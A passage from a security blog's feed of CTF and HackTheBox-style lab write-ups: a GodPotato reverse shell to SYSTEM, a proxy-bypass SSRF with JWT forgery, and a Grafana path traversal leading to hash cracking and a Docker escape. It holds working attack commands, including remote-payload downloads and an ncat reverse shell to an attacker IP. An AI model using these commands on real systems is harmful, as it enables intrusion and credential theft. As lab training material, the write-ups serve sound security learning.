PS C:\Users&amp;gt; cd svc*
PS C:\Users\svc_mssql&amp;gt; iwr http://10.10.14.113:8000/GodPotato-NET4.exe -outfile godpotato.exe
PS C:\Users\svc_mssql&amp;gt; iwr http://10.10.14.113:8000/ncat.exe -outfile ncat.exe
PS C:\Users\svc_mssql&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I executed GodPotato to run a reverse shell as SYSTEM:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS C:\Users\svc_mssql&amp;gt; .\godpotato.exe -cmd &quot;ncat.exe 10.10.14.113 4487 -e powershell&quot;

&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;SYSTEM Shell&lt;/h2&gt;
&lt;p&gt;I received a connection on my listener with SYSTEM privileges:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nc -lnvp 4487
listening on [any] 4487 ...
connect to [10.10.14.113] from (UNKNOWN) [10.129.15.151] 55355

PS C:\Users\svc_mssql&amp;gt; whoami
nt authority\system
PS C:\Users\svc_mssql&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Retrieving Root Flag&lt;/h2&gt;
&lt;p&gt;With SYSTEM access, I retrieved the root flag from the Administrator&apos;s desktop:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS C:\Users\svc_mssql&amp;gt; cat ../Administrator/Desktop/root.txt
cat ../Administrator/Desktop/root.txt
fc98f418f94f8cdb9a30ef026fe64345
PS C:\Users\svc_mssql&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Pipeline | CyberOdyssey CTF</title><link>https://dahmanisec.me/posts/cyberodyssey/cyberodyssey/</link><guid isPermaLink="true">https://dahmanisec.me/posts/cyberodyssey/cyberodyssey/</guid><pubDate>Wed, 05 Nov 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Pipeline&lt;/h1&gt;
&lt;p&gt;This challenge presented us with a multi-service architecture consisting of three interconnected servers.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h3&gt;Server1 (Port 5000)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Internal only, not directly accessible&lt;/li&gt;
&lt;li&gt;Hosts the JWT secret at &lt;code&gt;/.well-known/jwks.json&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Server2 (Port 3000)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Also internal, no direct access&lt;/li&gt;
&lt;li&gt;Contains the flag endpoint at &lt;code&gt;/admin/flag&lt;/code&gt; which requires a valid JWT with admin privileges&lt;/li&gt;
&lt;li&gt;Has a debug endpoint &lt;code&gt;/debug/fetch&lt;/code&gt; vulnerable to SSRF&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Proxy (Port 8082)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;The only publicly accessible component&lt;/li&gt;
&lt;li&gt;Routes traffic to Server2 but explicitly blocks paths beginning with &lt;code&gt;/debug&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Vulnerability Analysis&lt;/h2&gt;
&lt;p&gt;Looking at Server2&apos;s implementation, the &lt;code&gt;/admin/flag&lt;/code&gt; endpoint only validates two things:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The JWT must be signed with a valid secret&lt;/li&gt;
&lt;li&gt;The token must contain &lt;code&gt;role: admin&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;code&gt;/debug/fetch&lt;/code&gt; endpoint trusts any request with the &lt;code&gt;X-Forwarded-For&lt;/code&gt; header set to &lt;code&gt;127.0.0.1&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The attack path becomes clear: leverage the SSRF to reach Server1, grab the JWT secret, forge an admin token, and retrieve the flag.&lt;/p&gt;
&lt;h2&gt;The Roadblock&lt;/h2&gt;
&lt;p&gt;There&apos;s one problem - the proxy actively blocks access to &lt;code&gt;/debug/*&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (checkPath.toLowerCase().startsWith(&quot;/debug&quot;)) {
  client.write(
    &quot;HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Type: text/plain\r\nContent-Length: 9\r\n\r\nforbidden&quot;
  );
  client.end();
  upstream.end();
  return;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Bypassing the Proxy Filter&lt;/h2&gt;
&lt;p&gt;Two interesting observations in the proxy code:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Headers are manually parsed using a custom &lt;code&gt;parseHeaders&lt;/code&gt; function:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;client.on(&quot;data&quot;, (chunk) =&amp;gt; {
  clientBuf = Buffer.concat([clientBuf, chunk]);
  const meta = parseHeaders(clientBuf);
  if (!meta) return;
  const { idx, method, path, headers } = meta;
&lt;/code&gt;&lt;/pre&gt;
&lt;ol&gt;
&lt;li&gt;URL parsing errors are silently ignored:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;try {
  if (/^https?:\/\//i.test(checkPath)) {
    const u = new URL(checkPath);
    checkPath = u.pathname || &quot;&quot;;
  }
} catch (_) {}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using port 65540 (which exceeds the maximum valid port of 65535) causes &lt;code&gt;new URL()&lt;/code&gt; to throw an exception. Since errors are swallowed, the path check is bypassed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -X GET &quot;http://192.168.1.17:8082/https://localhost:65540/debug/fetch?url=http://localhost:5000/.well-known/jwks.json&quot; \
  -H &quot;Host: 192.168.1.17&quot; \
  -H &quot;X-Forwarded-For: 127.0.0.1&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The payload above gave us the JWT secret from Server1. The response contains the HMAC secret in the &lt;code&gt;n&lt;/code&gt; field:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &quot;keys&quot;: [
    {
      &quot;kty&quot;: &quot;RSA&quot;,
      &quot;n&quot;: &quot;random-string-for-hmac-secret&quot;,
      ...
    }
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, forge a JWT with admin privileges:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Using jwt-cli
jwt encode --secret &quot;random-string-for-hmac-secret&quot; &apos;{&quot;role&quot;:&quot;admin&quot;}&apos;

# Or using Node.js one-liner
node -e &quot;console.log(require(&apos;jsonwebtoken&apos;).sign({role:&apos;admin&apos;},&apos;random-string-for-hmac-secret&apos;,{algorithm:&apos;HS256&apos;}))&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Finally, request the flag using the forged token:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;curl -H &quot;Authorization: Bearer &amp;lt;your-jwt-token&amp;gt;&quot; http://192.168.1.17:8082/admin/flag
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And that&apos;s the flag!&lt;/p&gt;
</content:encoded></item><item><title>Data</title><link>https://dahmanisec.me/posts/data/</link><guid isPermaLink="true">https://dahmanisec.me/posts/data/</guid><description>HackTheBox machine featuring Grafana path traversal vulnerability and Docker privilege escalation</description><pubDate>Fri, 03 Oct 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Initial Reconnaissance&lt;/h1&gt;
&lt;h2&gt;Nmap Scan&lt;/h2&gt;
&lt;p&gt;I began the assessment with a comprehensive Nmap scan to identify open ports and running services on the target machine:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ nmap -sV -vv -p- -A --min-rate 3000 -oN data.txt 10.129.179.91

Nmap scan report for 10.129.179.91 (10.129.179.91)
Host is up, received echo-reply ttl 63 (0.063s latency).
Scanned at 2025-10-03 23:39:48 +01 for 37s
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzybAIIzY81HLoecDz49RqTD3AAysgQcxH3XoCwJreIo17nJDB1gdyHYQERGigDVgG9hz9uB4AzJc87WXGi7TUM0r16XTLwtEX7MoMgmsXKJX/EoZGQsb1zyFnwQR00xsX2mDvHpaDeUh3EtsL1zAgxLSgi/uym4nLwjTHqpTmm0shwDqlpOvKBbL7IcQ3vVKkmy7o7TG7HYMHiDYF+Aw5BKnOTuVoMgGy3gaFXJqyhszV/6BD9UQALdrtAXKO3bO4D6g5gM9N78Om7kwRvEW3NDwvk5w+gA6wDFpMAigccCaP/JuEPoeqgV3r6cL4PovbbZkxQScY+9SuOGb78EjR
|   256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGUqvSE3W1c40BBItjgG3RCCbsMNpcqRV0DbxMh3qruh0nsNdNm9QuTflzkzqj0nxPoAmjUqq0SolF0UFHqtmEc=
|   256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPDOwcGGuUmX8fQkvfAdnPuw9tMrPSs4nai8+KMFzpvf
3000/tcp open  http    syn-ack ttl 62 Grafana http
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: C308E3090C62A6425B30B4C38883196B
| http-robots.txt: 1 disallowed entry
|_/
| http-title: Grafana
|_Requested resource was /login
|_http-trane-info: Problem with XML parsing of /evox/about
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=10/3%OT=22%CT=1%CU=41988%PV=Y%DS=2%DC=T%G=Y%TM=68E050D
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M552ST11NW7%O2=M552ST11NW7%O3=M552NNT11NW7%O4=M552ST11NW7%O5=M552ST1
OS:1NW7%O6=M552ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M552NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 13.337 days (since Sat Sep 20 15:35:03 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   67.17 ms 10.10.14.1 (10.10.14.1)
2   67.26 ms 10.129.179.91 (10.129.179.91)

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The scan revealed only two open ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Port 22/tcp&lt;/strong&gt;: SSH service running OpenSSH 7.6p1&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Port 3000/tcp&lt;/strong&gt;: HTTP service running Grafana&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Grafana Version Identification&lt;/h2&gt;
&lt;p&gt;Navigating to the Grafana web interface, I identified version 8.0.0 running on the target system.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Exploiting the Path Traversal&lt;/h2&gt;
&lt;p&gt;This version was significant as Grafana 8.x is vulnerable to a path traversal vulnerability that allows local file read, as documented in this &lt;a href=&quot;https://hackerone.com/reports/1427086&quot;&gt;HackerOne report&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Using the PoC detailed in the HackerOne report, I crafted a request to read &lt;code&gt;/etc/passwd&lt;/code&gt; through the path traversal:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ curl &quot;http://10.129.102.172:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&quot;
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
grafana:x:472:0:Linux User,,,:/home/grafana:/sbin/nologin
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since I had file read access, I targeted the Grafana database file which typically contains user credentials and configuration data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ curl &quot;http://10.129.102.172:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fgrafana%2Fgrafana.db&quot; --output grafana.db
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  584k  100  584k    0     0  1262k      0 --:--:-- --:--:-- --:--:-- 1261k
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;└─$ file grafana.db
grafana.db: SQLite 3.x database, last written using SQLite version 3035004, file counter 423, database pages 146, cookie 0x109, schema 4, UTF-8, version-valid-for 423
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using SQLite Browser, I explored the database structure and discovered the user credentials table containing password hashes for two users: the admin user and another user named boris.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;images/image-2.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;h1&gt;Password Hash Analysis and Cracking&lt;/h1&gt;
&lt;h2&gt;Hash Format Conversion&lt;/h2&gt;
&lt;p&gt;To crack these hashes, I needed to convert them to a hashcat-compatible format using the &lt;a href=&quot;https://github.com/iamaldi/grafana2hashcat&quot;&gt;grafana2hashcat&lt;/a&gt; script.&lt;/p&gt;
&lt;p&gt;I extracted the password hashes and their associated salts into a structured format (hash,salt):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ cat hashes.txt
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl
7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8,YObSoLj55S
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using the grafana2hashcat conversion script, I transformed these into a hashcat-compatible format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ python3 grafana2hashcat.py hashes.txt -o hashcat_hashes.txt

[+] Grafana2Hashcat
[+] Reading Grafana hashes from:  hashes.txt
[+] Done! Read 2 hashes in total.
[+] Converting hashes...
[+] Converting hashes complete.
[+] Writing output to &apos;hashcat_hashes.txt&apos; file.
[+] Now, you can run Hashcat with the following command, for example:

hashcat -m 10900 hashcat_hashes.txt --wordlist wordlist.txt
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;└─$ cat hashcat_hashes.txt
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Password Cracking&lt;/h2&gt;
&lt;p&gt;With the hashes in the correct format, I launched a dictionary attack using hashcat:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ hashcat --username -m 10900  hashcat_hashes.txt  /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The password cracking was successful, revealing that the user &lt;code&gt;boris&lt;/code&gt; had a weak password: &lt;code&gt;beautiful1&lt;/code&gt;.&lt;/p&gt;
&lt;h1&gt;Initial Access&lt;/h1&gt;
&lt;h2&gt;SSH Authentication&lt;/h2&gt;
&lt;p&gt;With the cracked credentials, I attempted SSH authentication to the target system:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;└─$ ssh boris@10.129.102.172
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 5.4.0-1103-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Sat Oct  4 10:43:12 UTC 2025

  System load:  0.02              Processes:              206
  Usage of /:   41.2% of 4.78GB   Users logged in:        0
  Memory usage: 21%               IP address for eth0:    10.129.102.172
  Swap usage:   0%                IP address for docker0: 172.17.0.1


Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

122 additional security updates can be applied with ESM Infra.
Learn more about enabling ESM Infra service for Ubuntu 18.04 at
https://ubuntu.com/18-04


Last login: Wed Jun  4 13:37:31 2025 from 10.10.14.62
boris@data:~$ whoami
boris
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Successfully gained initial access to the system as user &lt;code&gt;boris&lt;/code&gt;. it was running Ubuntu 18.04.6 LTS with Docker installed (evidenced by the docker0 interface).&lt;/p&gt;
&lt;h1&gt;Post-Exploitation and Privilege Escalation&lt;/h1&gt;
&lt;h2&gt;Sudo Privileges Assessment&lt;/h2&gt;
&lt;p&gt;I tried to check what sudo privileges the current user had:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;boris@data:~$ sudo -l
Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This was a significant finding as the user &lt;code&gt;boris&lt;/code&gt; could execute &lt;code&gt;docker exec&lt;/code&gt; commands as root without a password. This presented a clear path to privilege escalation through Docker container manipulation.&lt;/p&gt;
&lt;h2&gt;Docker Container Enumeration&lt;/h2&gt;
&lt;p&gt;To identify running Docker containers, I used &lt;code&gt;systemd-cgtop&lt;/code&gt; to display container information:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;systemd-cgtop
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;img src=&quot;images/image-3.png&quot; alt=&quot;alt text&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The output revealed a running Docker container with ID &lt;code&gt;e6ff5b1cbc85c&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Docker Privilege Escalation&lt;/h2&gt;
&lt;p&gt;With the ability to execute &lt;code&gt;docker exec&lt;/code&gt; as root and a running container identified, I crafted a command to gain root access by executing a privileged shell inside the container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;boris@data:~$ sudo docker exec --privileged -it -u root e6ff5b1cbc85c bash
bash-5.1# mount
overlay on / type overlay (rw,relatime,lowerdir=/var/snap/docker/common/var-lib-docker/overlay2/l/2RMRALAZ4X3ETWWAFIO4URLCKU:/var/snap/docker/common/var-lib-docker/overlay2/l/C32RR2IYKIVOXMXZVRUH2EGVMU:/var/snap/docker/common/var-lib-docker/overlay2/l/CAVZGWG6DT37UBOHM6XHIUZUD5:/var/snap/docker/common/var-lib-docker/overlay2/l/3ATFAZLXUKTZ62T23IWWGNRXD2:/var/snap/docker/common/var-lib-docker/overlay2/l/42TJD6WDSINN56AZRW55R3ICO6:/var/snap/docker/common/var-lib-docker/overlay2/l/UTHFBRCC4KFYKXNBPIO52AZ7OQ:/var/snap/docker/common/var-lib-docker/overlay2/l/ZJJZSZR34MKC5KWMDRYIC4Q62C:/var/snap/docker/common/var-lib-docker/overlay2/l/EAWF5T66G6Z67H3LBO75E3NZCC:/var/snap/docker/common/var-lib-docker/overlay2/l/LMHE5BSBLFJITZ67RL5JIEM4SC,upperdir=/var/snap/docker/common/var-lib-docker/overlay2/90a0267386b75303aabacd2f202af4682d69d52a6d2e7e85ee93c3401e0938e3/diff,workdir=/var/snap/docker/common/var-lib-docker/overlay2/90a0267386b75303aabacd2f202af4682d69d52a6d2e7e85ee93c3401e0938e3/work,xino=off)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /sys/fs/cgroup type tmpfs (rw,nosuid,nodev,noexec,relatime,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I now had root access inside the Docker container. The key insight here was that the host&apos;s filesystem was accessible from within the container, as evidenced by the &lt;code&gt;/dev/sda1&lt;/code&gt; mounts.&lt;/p&gt;
&lt;h2&gt;Host Filesystem Access&lt;/h2&gt;
&lt;p&gt;To access the host filesystem and escalate to root on the host system, I mounted the host&apos;s root filesystem:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bash-5.1# mount /dev/sda1 /mnt
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Root Access Achievement&lt;/h2&gt;
&lt;p&gt;With the host filesystem mounted, I navigated to the root directory and successfully accessed the root flag:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bash-5.1# cd /mnt
bash-5.1# ls
bin             dev             home            initrd.img.old  lib64           media           opt             root            sbin            srv             tmp             var             vmlinuz.old
boot            etc             initrd.img      lib             lost+found      mnt             proc            run             snap            sys             usr             vmlinuz
bash-5.1# cd root/
bash-5.1# ls
root.txt  snap
bash-5.1# cat root.txt
581d576d3f354b7ceca1b41760ce0596
bash-5.1#
&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Sendai</title><link>https://dahmanisec.me/posts/sendai/</link><guid isPermaLink="true">https://dahmanisec.me/posts/sendai/</guid><description>VulnLab Windows Active Directory machine featuring weak password policies and certificate template hijacking</description><pubDate>Wed, 10 Sep 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Initial access&lt;/h1&gt;
&lt;h3&gt;Nmap Scan&lt;/h3&gt;
&lt;p&gt;I began the assessment with a comprehensive Nmap scan to identify open ports and running services on the target domain controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.95 scan initiated Wed Sep 10 21:24:11 2025 as: /usr/lib/nmap/nmap --privileged -sV -vv -p- -A --min-rate 3000 -oN sendai_tcp.txt 10.129.220.222
Nmap scan report for 10.129.220.222 (10.129.220.222)
Host is up, received echo-reply ttl 127 (0.048s latency).
Scanned at 2025-09-10 21:24:12 +01 for 196s
Not shown: 65511 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-10 20:25:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&amp;lt;unsupported&amp;gt;, DNS:dc.sendai.vl
| Issuer: commonName=sendai-DC-CA/domainComponent=sendai
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-18T12:30:05
| Not valid after:  2026-08-18T12:30:05
| MD5:   879e:fbc1:988b:964a:e183:6735:66b8:9f3c
| SHA-1: 099e:0fbb:349b:7fb1:35de:6acb:77a4:c3e5:d0e1:4578
| -----BEGIN CERTIFICATE-----
| MIIGFTCCBP2gAwIBAgITVwAAAATYPsFplvexvwAAAAAABDANBgkqhkiG9w0BAQsF
| ADBDMRIwEAYKCZImiZPyLGQBGRYCdmwxFjAUBgoJkiaJk/IsZAEZFgZzZW5kYWkx
| FTATBgNVBAMTDHNlbmRhaS1EQy1DQTAeFw0yNTA4MTgxMjMwMDVaFw0yNjA4MTgx
| MjMwMDVaMBcxFTATBgNVBAMTDGRjLnNlbmRhaS52bDCCASIwDQYJKoZIhvcNAQEB
| BQADggEPADCCAQoCggEBAM/zoBh9/Vf9Dg2a7ZByPbs7K7m34f14/NBkNL+qvWwW
| A6uVwcXtdqZTm2m/ihyTcq1HCADBVR57BcB0S6nkIIqoTis/ATH+E4zj1Mpek3ml
| IxXv3yer14cVtP5cCmlm92rFMLbdAmnH3VyEGoE0pg64OtwPbAuYHTpnuaRQvdfl
| dWILGe0qsBahDpOhgxnpxLZFuacK3mCy45mz8T1iwYpMLo9WE7z2o/THjP58dCJ3
